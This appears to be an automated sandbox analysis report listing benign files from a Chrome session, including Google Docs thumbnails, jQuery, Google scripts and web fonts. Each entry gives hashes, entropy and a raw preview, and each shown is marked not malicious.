                                                                                                                                                                                                                                        MD5:EB8C32B7A11DD6F2F39C8A91165CCAD6
                                                                                                                                                                                                                                        SHA1:08EB841B35D7EA38CE68C2E60234113A92B0D900
                                                                                                                                                                                                                                        SHA-256:8C5E340716BDD5A1AB5E88E965C24F7B621429291B7B96D9CAB4705800D77081
                                                                                                                                                                                                                                        SHA-512:86279530BCC8D3B6D49601381313C0CA5A0A4CBF5D2AED359C372AD351D4734FF455D01AE50DBB8C7AB5B2ECA75387BD8B5ACC9F0A95B2325C3B116CA54A8F86
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1gaHktCHD_eVlToocsUCE2KL2R5w_vD3BsqCgJwCM3X0_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..K`IDATx...1.....0.K...[.E.... ,.a........a...@X..... ,@X...h.. ,.a...(..9n.....(E.z.S..f.n..&;.`.....l6.3.......c.'......j...Qk,...Z..VS.U.l..i.o.::,!....Z..2+..u..:..!$...+..?..f.U.!$.....9...=......^O.5.!G.g.?.($n....n.:..,..JK.!a........ub..3,37.^.u.d..~r.N!........e..].!s...7...5yn..n.....,..e.YB.........\4..".J.am.}7...C.v......x..U.W._..<.x..T.",.E.!$....k..s.3...N.+...-,"..?..y9....U...B.*..!...M.p..3.M....mX(...[~pM./.v.jI..C...~F..q..Vf..*...VCK/n.&.w$...oM.L..C.&...\HYC......,.-BU....\NS.U.`..Z.}ZJ.fK.!..%.....BHXB..K.!$,!........BHXB.!a.!$,!.....B..........VO....._....;...+++.4h.k?..S.....g.F.....B.....k..;F~....~`W...vx5|..k.Z.E.!aEGG;+.%..3B......!C>.....f{....f..EX....w..7n.....Y.f].|.r 11q..C...../....T.........L.E.....0Q...9..G.........;3g....~7e.[.nq.l_QQ...F..S....,X.?...^.ju.>O.<9m.4...I.o...3..]..g....Ul....!...pT....#.....X.......|..W...+...-."...%...N.).bbb.9~..........A(.-C...=k;
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):112258
                                                                                                                                                                                                                                        Entropy (8bit):7.99398255557757
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:/HRhPE01k0knip16ZFTT2xVLELtALzVePpH:ZhPB1kBkAbTUxutA8pH
                                                                                                                                                                                                                                        MD5:4A732F4AEB8CEE4682ACDA194340D0A3
                                                                                                                                                                                                                                        SHA1:609EA787422F0131C7EFF264406F55D21A02D9B9
                                                                                                                                                                                                                                        SHA-256:7ADC9DAD55CB1A388B920655E69FFA6DE458ED2DFCF8BBBDEB1A83B27186B526
                                                                                                                                                                                                                                        SHA-512:8F7387603EB8C4BFFA72C80DAB7944F1173EDA3BE20999041C68DCFF7A4A1E115C26B085E220B04EEBC4D5C434D31DB002D74909E4BC34BB0E4AC44D8CB6A097
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1Wznc4ASHYqRxtOQdKp9V0Bt337NFsxC5d3rekQWisSQ_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(...IIDATx......... ...9>!.)..).......`+,.a..'V.%7.l%Y..{.{.!.<ffffffffff.y..2.3..04.%._.N|r..W.8.....<..g6..J)EA...7..-...B(#TF.D."xW...!(..)#..H.....O!.!,..1....h...<..Ad...t.....SK...G./.o5........Ox..O......a.un......~.._>33.<lav....:w......6{...33..0.2...{.]....Sf.....uR8.t\.......XXX......={..*4...J.csG.u......E...w..{R.......O..jDE.\..9+s..!.V6..w.W....{...........@&.:...n.).IoU........H.d.}..F..);.].~.k...=..T.....Q(......q..s'.j....l.............eYv...%M+.....Q...V7o../.K.Wj....K..l.o`-....B][Y....~.....;>.U..<b..1..q..s.@..|..^...cm#.]J......lo5..A6.b..R.a....4(...o...PF.x.K.I.g...2j....+...M......=L..t....L.)....J...\.+....%.].P..isL..3z{{:K.|>.N}....X.i5]'..J...D....9e....p%.>....e.hh....u...|*T..:..$...Q@.FR2....~.....R...HI.z.. @\..m;%DH.i..."..F-?ln.c..).WL.......T.6*!.x..,..T.a"Xn......?0......./.w/......R..R,..K..Eq.*.J...cD"..@.`.e..a('.....5....R....0........:o..../.11.]..[\<4.T..=e.l...[o..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39110
                                                                                                                                                                                                                                        Entropy (8bit):7.973037510570099
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:OtW1fIooPHormWtsqA0ackjma09+R6OAgQRfunV0iC5IwW5:D1fIn6DA7csjR47g4unvuW5
                                                                                                                                                                                                                                        MD5:6722E8F4FEB66A0307F5298868D9AD6B
                                                                                                                                                                                                                                        SHA1:6CA6CC3651191A14C80D6B6741F9E63D50D2DA75
                                                                                                                                                                                                                                        SHA-256:15B57EB1EE46F060DF9F0000A3BA84273B728AD1D82917699A488BBBC862F15F
                                                                                                                                                                                                                                        SHA-512:8CEE661997FE6B33CCAD6E438F9A92E1A32CCC58AB1636C3CF10AB1DC50ACD02D8C74C118FED6091D9454AE54111C69AC191CDB45E97EAE29AEC029C4FFC60CD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx......._U.=3/m..*G...d0.6.9......p.`.........E.sN.g.0....0Y.r.....tW...}..XKBH+._..............t.Yf...aV`.2.,..k.Yf.eV`.2.,..k.Yf.eV`.2.,....Yf...}c...U.Z ".\P.{.....9..<f.>......J.f.,...... ....}..K..5.g!oxB.Jc....M....c.D.j?A.....s.X.x.....=.IG.K.....h..N. "...^QU8t...C....@...!P..h3..Lu....V...R.$.V.-...e/..g?.....9K.....a.gB......{m..8.L?gIa...,.i}.G..-.5k.w.+...C[.....e.. .F.Q..(""0..........?|....&......C.q.9R....Y..G....-..`C@e`/.:..[.....<U.K..o.K.......;.[.a..."."!...Q.$..`..E.......w.F...J.N..9"BD@B..;g...C#..#TE.X..6i.h.v..i.2..k..+.E..0h..P...........o}... h.|..j..j.q.&..b.+A....B"..,..L7...A...G=....C ..q_.4.R..jW.T3!...c;...1o..U<... .">..!d.7.{.3..l.FQ`..?f.!.@HH@X|.E+.]..s...xqg..R...eK5..m.q..)42..(.T...Y3..X..Gq.f.u.b2....A..`.H...F*.....<.!..b...Y..6!F.n...JD.z.H...<..:T.L.E.....*.URV.i.y.4;.[6...@ZM...'...BT.@....A....y..s^..nU.4.}..aL$...(........!..v./n....D...q.8.7..%
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):13852
                                                                                                                                                                                                                                        Entropy (8bit):7.902890859926445
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:2m1WmRHTFW3g+/n4axk7MEJ8eRXW0lR3w8YhN/i:2EHJWz/n4pwEJnGw36hNq
                                                                                                                                                                                                                                        MD5:57F063ABAC5BD2B34C7D0966790D6017
                                                                                                                                                                                                                                        SHA1:CE1AD9B6FD3E1595C164D3670ACB3EEA99168E0A
                                                                                                                                                                                                                                        SHA-256:D0DEBBF2ABDF04249D3A16E06304FC2534889B3A7143BEA0C99D06169F4314BF
                                                                                                                                                                                                                                        SHA-512:BA8ACE696AE0C944A0E78DA75080249C6AA31FC747CF30F6446FB78F5429CF6156DA1230261E35494E9DC41C7F87DCE6ADB7D3E8117146184384EC1E94A1F8DA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1qLIYlZx4XZBs51LoKITZWMPGd3Qmx0ZYa0UIxQX4zMI_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..5.IDATx.....@....J(..$...[/..\.g/.pv...@.....,.....@.....,....,@....@.....,.....@.....,....,@....@.....,@....@.....,.....@.....,.../.....WUD,....v....(..RU.TJ%.$.JR..l..E)TB)$U@.*..$..!H.......@. I.b.ko;.z.z...z.9..3.|.s.MMM..K~~~......|.K..,,,...>........5#..>88.;*.....TDDDee.........\rrrhh...b..nFGGonn....xcc...>66F..E:<<...._........VGG.zy..occ...y{{.^..U...fff*."............K...2.......:544x{{[YY...Q..1.......]]].....mnn.?**.....`a.,.....}}...KJJ...#&//...Z.'&&..F.[ZZ......*&*))...%.0D............x~....\.XR....... ...........s>xGG...~....YPPpqq...ELSS.....]YY.y.....\]]....W..t...y...1.(s4.... ..1........b{{{.....>...........Z`uvvB....+.`.E*EJ.K.......`..iii...555.)|.{{{j$\.......{KK.:.......M..X...U...#.....Y..U.EN.....!.D..jK....X.Q.Ba.555E...gEJ.K.....Nss3....r.v.)...m$m D.W.).S111..YX...5.;.}.%A..u.........8.@......X..+R.XR.j.U......k-T=|.*.......rrr......,j.v......I.%...[[[..X<?a......S.$....,F?......a.....
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):89501
                                                                                                                                                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):870417
                                                                                                                                                                                                                                        Entropy (8bit):5.754773036275944
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:QCUjTl1rkXepvNDXElW6mKMYpMdP1poSuyf/h:QCUjT/rkXC8WzdPkSuyf/h
                                                                                                                                                                                                                                        MD5:9554FD9A9E8B1A6D8489FEDE9D517376
                                                                                                                                                                                                                                        SHA1:C136B2DF147DAEDF2FCE8F103CA6BE5E73BB5198
                                                                                                                                                                                                                                        SHA-256:67A8E2DAD69D378AD8D8878DA08F8FFAA0E4DDA0C7E7402DFE30BA12E27EE431
                                                                                                                                                                                                                                        SHA-512:F14CA431950A95AC2FE3C0DA50BD2EBF6A1D8537CB96D93EDA4516C40260738F71A8A3FDC9B8D17659AAC2F9057B8A023E909A5DAA3384DEA8AA65E65B2B56AA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:"https://contacts.google.com/_/scs/social-static/_/js/k=boq.SocialPeopleHovercardUi.en_US.OTDGvqrbWkA.es5.O/ck=boq.SocialPeopleHovercardUi.am_eiS5DCJI.L.B1.O/am=AAzwBg/d=1/exm=_b,_tp/excm=_b,_tp,hovercardwidget/ed=1/wt=2/ujg=1/rs=AGLTcCMGAOB_dxffKDnVcDexqPgg1STFGg/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:O1Gjze;xqZiqf:wmnU7d;yxTchf:KUM7Z;zxnPse:GkRiKb/m=ws9Tlc,n73qwf,GkRiKb,e5qFLc,IZT63,UUJqVe,O1Gjze,byfTOb,lsjVmc,xUdipf,ZDZcre,OTA3Ae,ZwDk9d,RyvaUb,WO9ee,mI3LFb,Xg7Hl,O6y8ed,PrPYRd,MpJwZc,LEikZe,NwH0H,V3dDOb,lazG7b,XVMNvd,L1AAkb,KUM7Z,s39S4,lwddkf,gychg,w9hDv,RMhBfe,SdcwHb,aW3pY,pw70Gc,EFQ78c,Ulmmrd,A7fCU,mdR7q,wmnU7d,xQtZb,JNoxi,MI6k7c,kjKdXe,BVgquf,QIhFr,hKSk3e,hc6Ubd,SpsfSb,Z5uLle,MdUzUe,zbML3c,zr1jrb,Uas9Hd,pjICDe"
                                                                                                                                                                                                                                        Preview:"use strict";_F_installCss(":root{--boq-chrometransition-background:#eee;--boq-chrometransition-active-background-opacity:0.8}.KL4X6e{background:var(--boq-chrometransition-background);bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.TuA45b{opacity:var(--boq-chrometransition-active-background-opacity)}.VfPpkd-JGcpL-uI4vCe-LkdAo,.VfPpkd-JGcpL-IdXvz-LkdAo-Bd00G{stroke:#6200ee;stroke:var(--mdc-theme-primary,#6200ee)}@media (-ms-high-contrast:active),screen and (forced-colors:active){.VfPpkd-JGcpL-uI4vCe-LkdAo,.VfPpkd-JGcpL-IdXvz-LkdAo-Bd00G{stroke:CanvasText}}.VfPpkd-JGcpL-uI4vCe-u014N{stroke:transparent}@keyframes mdc-circular-progress-container-rotate{to{transform:rotate(1turn)}}@keyframes mdc-circular-progress-spinner-layer-rotate{12.5%{transform:rotate(135deg)}25%{transform:rotate(270deg)}37.5%{transform:rotate(405deg)}50%{transform:rotate(540deg)}62.5%{transform:rotate(675deg)}75%{transform:rotate(810deg)}87.5%{transform:rotate(945deg)}100%{transform:rotate(3turn)}}@keyframe
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):66034
                                                                                                                                                                                                                                        Entropy (8bit):7.993242989760179
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:yJjgGU8fyLpSca+Q0r38GM9Pho9mjAkh/HXkbal1hDpKv3IC:hGU8fy0cV8fi9YhPb1HC
                                                                                                                                                                                                                                        MD5:ACF75D7BF4A84D85F8CCC0945FAAA71B
                                                                                                                                                                                                                                        SHA1:C37DF6E707BE5AB783C7EC844E42F7C621C516D3
                                                                                                                                                                                                                                        SHA-256:B2158679569F4CF65197146AC0CFDB4ABE9E496403F167816A03C0ABDDCA26E6
                                                                                                                                                                                                                                        SHA-512:DD2E516215A7C19D35E2DD5323886313B07795674CE8977337B8EC89C1A9AA54759373F761688692B67D698A87315CA25F8A98F38BE66D1EDC218AB6882148F6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx...1..... .G.EK.xB....x.. ,.a........a...@X..... ,@X..... ,.a............@X..... ,.a........a...@X.......@X..... ,.a....... I.BX.;v.. ..q........{..X.&{....{..m (h..Y,..Lw...e.|./]..>n.I.R.F.qR.y.....y..".2D._a.,....iJ..RZJ..t.(.,..:..{..2D...vB.0..e.e]W...`]...Eq.i.]...4.8......b..>......,.$I....xa1.........{WU...:...{V..!.D.A....% %P.%RH.......... %.}|........g.7...1M3..<...M.8.!..kR.$........<...+8..i.(.m.q.4M.a.....3.C..}...q8.<.}O...\@.e.N...y^UU..s1.8R..8..,.....0...8&.E.JCcQ.eY.<z...:...Sx..a.90B..3.-8....(..i.(.O..*.;H..X.e.'.p.6.u1....\.$..,K.q.u/v..S@ ......B.CZA...6.(...%h........ .>......9.61......'.i.q,I.k..C%..2a.F........0T.....EQ._.y6M3.#..UU.,.u.V0..e.pkE...}...y..yUU.A..kY...m.....eYy.c.\.........wX. ..VD.u.}._9..q..VO..}.k+0M.m.x(.jg<.{...E..'.Q...)...}.~..X<mEjK..:.{g8.lE..P..u]...........a..H.#..#b!...B2Yl"e`6....n.'{../...W.z.. ..\...x..{.y............."......l.r.P(..F.v........2H.5...%
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (880)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):164019
                                                                                                                                                                                                                                        Entropy (8bit):5.068564432958455
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hwHCEN8CJKxfT2zikaZaPBbJMYLQQZTEvMxZgzgzXPXpe:hw3J0fTuaZaPBbJMPQZTEvMxZe8XPXpe
                                                                                                                                                                                                                                        MD5:24CE02F460E8C9293C1ED52A5575522D
                                                                                                                                                                                                                                        SHA1:267170340BB963756E8044D7C5C4E22888DFD1A3
                                                                                                                                                                                                                                        SHA-256:7707861D1414ED16F28D382E08592D990771F7461CD99C5CF411A0B544D1C8E5
                                                                                                                                                                                                                                        SHA-512:E8F7BFA30274CC9DE7BFDBE4F408729E4152FC39FFCF54162B4FE887DE0322C75A3E48FDA43113D6B2198704B1E343192D3CB2CBFE4EB4EDB52019B9F0D2B8B0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:mK(fta);.var mEu="\u17a2\u17b6\u1791\u17b7\u178f\u17d2\u1799",nEu="\u17a2\u1784\u17d2\u1782\u17b6\u179a",oEu="\u179c\u17b7\u1785\u17d2\u1786\u17b7\u1780\u17b6",pEu="\u1798\u17b7\u1790\u17bb\u1793\u17b6",qEu="\u1780\u17bb\u1798\u17d2\u1797\u17c8",rEu="\u1780\u1780\u17d2\u1780\u178a\u17b6",sEu="\u1021\u1004\u103a\u1039\u1002\u102b",tEu="\u101e\u1031\u102c\u1000\u103c\u102c",uEu="\u1017\u102f\u1012\u1039\u1013\u101f\u1030\u1038",vEu="\u1010\u1014\u1004\u103a\u1039\u101c\u102c",wEu="\u1010\u1014\u1004\u103a\u1039\u1002\u1014\u103d\u1031",.xEu="\u1000\u103c\u102c\u101e\u1015\u1010\u1031\u1038",yEu="\u0db6\u0dca\u200d\u0dbb\u0dc4\u0dc3\u0dca\u0db4\u0dad\u0dd2\u0db1\u0dca\u0daf\u0dcf",zEu="\u0d85\u0db4\u0dca\u200d\u0dbb\u0dda\u0dbd\u0dca",AEu="\u0cae\u0cbe\u0cb0\u0ccd\u0c9a\u0ccd",BEu="\u0c2e\u0c3e\u0c30\u0c4d\u0c1a\u0c3f",CEu="\u0a8f\u0aaa\u0acd\u0ab0\u0abf\u0ab2",DEu="\u09b8\u09c7\u09aa\u09cd\u099f\u09c7\u09ae\u09cd\u09ac\u09b0",EEu="\u09a6\u09cd\u09ac\u09bf\u09a4\u09c0\u09af\u09bc \u09a4\u
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 3920, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3920
                                                                                                                                                                                                                                        Entropy (8bit):7.936910222388939
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:l7fmthUeIAh/HmAgoWuqkjQ6ZDI89LCVRIqrqljd:JfIUeIAmVua6Zn9AP+hd
                                                                                                                                                                                                                                        MD5:6765F5BD215CD2C602B556A234C54B43
                                                                                                                                                                                                                                        SHA1:57F399C40FCCE53B34A432C726AF46CCC32B48E9
                                                                                                                                                                                                                                        SHA-256:3FB996BA3B12645DE6771FB387E25693ADC3941EF19BC814F5CB2A3E90C549F4
                                                                                                                                                                                                                                        SHA-512:2BCBCD7A8EA5F09D3A06CB97D9BEBF108C934DD25FC540E39F20917F5F85443A2D7DF4B9AEBA922DAF80AB96ADC135F8F9817C4E199F0B9070422ECE947F6F8B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v47/KFOMCnqEu92Fr1ME7kSn66aGLdTylUAMQXC89YmC2DPNWubEbVmSiAo.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......P.......d..................................4.`?STAT^.f..~.........g....6.$. . ..x. ..N...#..5*._..dh<.1...&..U5..O......8h..cC[p..hB..i..#.......s....D......P.L4|dG(=...?..7..hW.-..'7..Gp.5.P..u..e...,..(....3......z.R..d...y.Un..`.1....~...|.-..yo.......1....E.....u..L|......{...+....de..{'.....L...[..@F.&)..~...J[!\m...=.......=V}'.4.pZOfuB.u..,.o...P.n.z.B.VQ..-...lA.dI..3A.-h./.<?..I.*.@q..h(c.S...L...p...[i6..nPl#-].{.......\.-B..E0..Q..Ak..r..'.3/?..........B.....<...t..B......wp3...8...c.......Io.".I...P..."f....t.w...a...........z.............h.K.*hU.c....#....o.Elo...x.......wj|.#..N.|...=..S8.c..v.yR...G.:....4...8..{..p.}.._..e7=.......>.h...h..5.......VR....7+.-...+..m......n.uVS....gqa~nvfzjrb|ltdxhp@..H.............X-c..7_...E....g..t...}:.....G........).W...Y...r..s.2..>X0.?.z<....)...KF.R.s..r.`!w.4..xZZ.....-..,+....J..q.....yk.....L.E).....z.0~o...a.8.9.....i8.]...+n.S..R].Ud:>...........,.%......+y.H.i..X...a
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 58892, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):58892
                                                                                                                                                                                                                                        Entropy (8bit):7.995858140346243
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:zGRB4sZLebJD4gQL8CcWXYwk3V57Tt+5dLOj3aM:yRHZe94cCcWXYwCVrgdy7X
                                                                                                                                                                                                                                        MD5:386F2237074CC59495783195EA1F1295
                                                                                                                                                                                                                                        SHA1:81B3014B28B6E7EF2FDB39ED73D18EE38F1C36A5
                                                                                                                                                                                                                                        SHA-256:66A070C331573AA324FA2DEAC1A1B42B2D58E9660268555EE382D857E651E33F
                                                                                                                                                                                                                                        SHA-512:CEEF23D705E9D11C1FAD6D6704F2D1B3A59EE65B85CF240483484AE213E30DC2B59370BCD2FA61016256468A319B5033FB6F48C505BBCADA79B7489C1EA36CD3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/merriweather/v30/u-440qyriQwlOrhSvowK_l5Ofg.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............58.............................t..(..T.`..(.....m.....h........6.$..|. ..r.....1[&.q.....uW..g.;.T.6....d..^!.X.r.C...|...J....M2....x....P...M.@...1{.%....lJ..N.&..8..n.- ..a.c....~:...pa0a5Z...E.^...i.@M1pD.K..zb2Y]h..n.h....~.../...-..X.h7.J..TR%U2u...6..|($)i`......<.,..5Ex.X#...w/r.....W..3.J.G....Pe....b.........Y2.~.i..fG.....gq...... ..9.x....?.S'}S.d.C..;..L.%..+...*.=.{...9C....,.D.s...F..)2B....T..h.H...H.U`.......*.......Y8...q...%...e.++#+}...tv.^4D.$.....e......`?.^o...P.Y..q..0.L.../.......v...%.1...,2.L.(..~.............<......4/c..zIIW..;*+Tlf...S...]..b.J:.NA:..A........f....R..A.Xa.Ph..Ii.......B...........J..i.j@..ZW.........IV.....P..`.+!.2.......d~..<$5...S*....{....e..-..U......g.SH.}...........~........,.R.d....P..t.?..E.A,...UI...z7.7..x8.....0.. !.cs.~....U. .)..l..{>.DdS......6...]x....X.=.*.@....T..\..9?O......bD.`D........pYq.S.t..0lE...WP... Cc......lZ.C.....Cwp..V/....k.f^......b+
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 37488, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):37488
                                                                                                                                                                                                                                        Entropy (8bit):7.993533567842416
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:esvocDJKJeW3cmJF3+1Xis/PjgqMLohr1C06HbC4V7:esvowKJl3c9iKP85kN1UbCe
                                                                                                                                                                                                                                        MD5:2A7652831C7699009E0C25DABF93430A
                                                                                                                                                                                                                                        SHA1:6B0A143D883AFB8FF3CA2BF55B448AF8B68F2F89
                                                                                                                                                                                                                                        SHA-256:C3525FCA875BF7203E92F116E0C5532DD5B5FE0F0CA5E12C6C4C8B9BD77566E2
                                                                                                                                                                                                                                        SHA-512:5AB58B2A6B9A39A2F14E824E9FA0005D2A615A95AD1496025C1DB67EB6B7F9F67ECA26EC96665EFDBCA86AEE237300714E52705777503DE1D0F6EFCFD4F21D0E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/comfortaa/v45/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4WjMPrE.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......p......................................p...r..r.`?STAT...6.....X..!..P..6.$.... ..h.....[.|.E.bl.......nRU...9...s..9-...C)(.*.Z.....".d......!..i.i...6E....A..f.-G.dL...L,%.Q....,..Qs..........'.kF^.3,#w..!p..Z.z..~.?2./..^.... U%U..#.y:.f...Bg....G......y...eT......;..~BPZ.=..4R.Ti...nb.oG.r..j...P..J..u.....4M.<.).Y.K..i.S.E...%-...>b..(AqH.kv.@"......h.|g'.F...T.....lM.c\..^.{.w..)M..$H9...&.}2a..I...v.fL...J.5...6.Y...(,.aO..`...?..M<.x....A..N..!"O.).zU.7=.S.V....{..p.t.|.n...Y.......m.....G..a.R.PI..(i.......DZ.lb..`.`ba.5.Q W._...9..A..O....}2.&t.)-r.3.).n..N...v.-.;g.a.'.l...6...(..}.#....Va4..7..`.C..(...,.U...uQn.s....5....P....,...T 8..v.<...j........B'c....Ah4Ba$F.Y.sz.eD..?..w..*.N".......).o7...j.l../E.5...[J=..O|s...r..5.C..^7.:m.Zy.`.......K./....}x.?.u..............mJI%..UhiRK..._..ME....-6.......)c.....2............?..X..D".#..}.........mh..nm;...r@r.~....i..@..?_R..x.*..Nm....p8..p.i........\._...P=.u...v..W..eCmw
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16379
                                                                                                                                                                                                                                        Entropy (8bit):7.946086064277391
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Agyj8C8qZnntrq7LhmmCcVb6GimVcmC7tBC:+/qHZCQOGumC7tQ
                                                                                                                                                                                                                                        MD5:E2A4454402E767F3E8A64D83581FA0F8
                                                                                                                                                                                                                                        SHA1:C2C0A2FEEEAFB66E1FF649CB397100C888E342D8
